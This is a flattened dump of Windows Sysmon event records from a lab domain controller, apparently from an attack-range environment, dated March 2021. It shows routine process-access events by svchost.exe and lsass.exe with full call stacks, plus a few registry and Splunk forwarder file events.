12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.093{266CAFBE-646C-6064-0F00-00000000AE01}11161508C:\Windows\System32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE38DF8BF8C0B468DD107B039B5FA1E,SHA256=5B63EC5A41A8B0771F6D8C8677A5F1ECE2011F190E00FCDFCDB671427552C66F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.030{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.030{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:12.961{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.961{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
